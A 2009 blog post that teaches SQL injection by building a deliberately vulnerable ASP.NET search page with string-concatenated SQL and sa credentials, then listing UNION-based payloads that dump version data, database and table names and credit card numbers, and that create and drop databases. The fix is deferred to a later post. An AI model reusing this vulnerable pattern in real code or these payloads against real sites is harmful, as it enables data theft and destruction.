Bluedog67

Random Thoughts About SQL Server and My Dog Blue

About Bluedog67

My name is Stephen Horne. I am a well-trained owner of an Australian Cattle Dog named Blue. I also develop software mainly using SQL Server, ASP.NET, and C#. I love data, databases, T-SQL, and turning raw data into actionable information. My plan for this blog is to write about SQL Server and sometimes my dog Blue. Please contact me at stephen at bluedog67 dot com. Follow me on Twitter at bluedog67.

Introduction to SQL Injection Attacks

SQL Injection Attacks. They have been in the news recently with the WSJ and NASA Hacks. What are they? Hackers attack your database through a nice pretty front door that web application developers built and you, the database professional, didn't prevent.

In this post I will show you three things:
  • Creating a SQL Injection-Susceptible Web Site
  • Attacking The Site With SQL Injection
  • Stopping the SQL Injection Attacks
Creating a SQL Injection-Susceptible Web Site

Using Visual Studio 2008, ASP.NET, C#, ADO.NET, SQL Server 2008, and the AdventureWorks database, we will create a very simple web application that is susceptible to SQL Injection attacks. SQL Injection attacks are not associated only with Microsoft technologies but affect all web development languages and databases. I will assume either a reasonable level of knowledge with ASP.NET and C# or that you have access to an ASP.NET developer to help you create and deploy the following mini-application.

Following are the basic steps:

  1. Create new C# ASP.NET Application Project.
  2. Drop a TextBox, Button, and GridView onto the Default.aspx page.
  3. Double-click the Button and add the code below to the code-behind file. Update the database connection information as necessary. For testing purposes uses a sysadmin account. Make sure the server is not a production box! <grin>
  4. Add "using System.Data;" and "using System.Data.SqlClient;" to the header of the Default.aspx.cs code-behind file.
  5. Deploy.
protected void Button1_Click(object sender, EventArgs e)
{
  string strConnection = "Data Source=SERVER;Initial Catalog=AdventureWorks;User Id=sa;Password=sa;";
  using (SqlConnection cn = new SqlConnection(strConnection))
  {
    cn.Open();

    using (SqlCommand cmd = new SqlCommand())
    {
      cmd.Connection = cn;
      cmd.CommandType = CommandType.Text;
      cmd.CommandText = "SELECT ProductID, ProductNumber, Name, ListPrice FROM Production.Product WHERE Name LIKE '%" + this.TextBox1.Text + "%'";

      using (SqlDataReader dr = cmd.ExecuteReader())
      {
        this.GridView1.DataSource = dr;
        this.GridView1.DataBind();
      }
    }
  }
}

The application is very basic. If you click the button you will see a full listing of the AdventureWorks.Production.Product table. If you enter some text, for example Cap and click the button you will see a filtered list. Congratulations! You have created a SQL Injection-Susceptible Web Site! And depending upon the rights that the user you used in the application's connection string, you could be in for some serious serious trouble!

Attacking the Site With SQL Injection

Now is where the fun comes in! Let's do some hacking!

Following is a script that a hacker would place into your application's TextBox that starts to open the SQL Injection door. It isn't very hard to figure this out. Trust me.

XYZ' UNION SELECT 1, 'TEST', 'TEST', 1.23; SELECT '

Interesting.

XYZ' UNION SELECT 1, @@VERSION, 'TEST', 1.23; SELECT '

What the hell!?!

XYZ' UNION SELECT 1, name, 'TEST', 1.23 FROM master.sys.databases; SELECT '

Good grief!

XYZ' UNION SELECT 1, TABLE_CATALOG + '.' + TABLE_SCHEMA, TABLE_NAME, 1.23 FROM INFORMATION_SCHEMA.TABLES; SELECT '

...

XYZ' UNION SELECT 1, CardNumber, 'Test', 1.23 FROM Sales.CreditCard; SELECT '

Uh. Not good.

XYZ' UNION SELECT 1, TABLE_CATALOG + '.' + TABLE_SCHEMA, TABLE_NAME, 1.23 FROM INFORMATION_SCHEMA.TABLES; CREATE DATABASE Test; SELECT '
then run
XYZ' UNION SELECT 1, name, 'TEST', 1.23 FROM master.sys.databases; SELECT '

!!!

XYZ' UNION SELECT 1, TABLE_CATALOG + '.' + TABLE_SCHEMA, TABLE_NAME, 1.23 FROM INFORMATION_SCHEMA.TABLES; DROP DATABASE Test; SELECT '
then run
XYZ' UNION SELECT 1, name, 'TEST', 1.23 FROM master.sys.databases; SELECT '

Pull the plug! Now!

As you can see things can go from bad to worse with SQL Injections fairly quickly. Largely depending upon the rights of the connection's login and the skills of the hacker you could have a very serious problem not only with your database and database servers but your entire network and all your servers. And this is just scratching the surface!

Stopping the SQL Injection Attacks

I am going to hold off on this until the next post. In the meantime: SQL Injection Attacks. Be Afraid. Be Very Afraid!

Categories: SQL Server
Posted by stephen on Thursday, December 10, 2009 1:33 AM
E-mail | Kick it! | DZone it! | del.icio.us
Permalink | Comments (0) | Post RSSRSS comment feed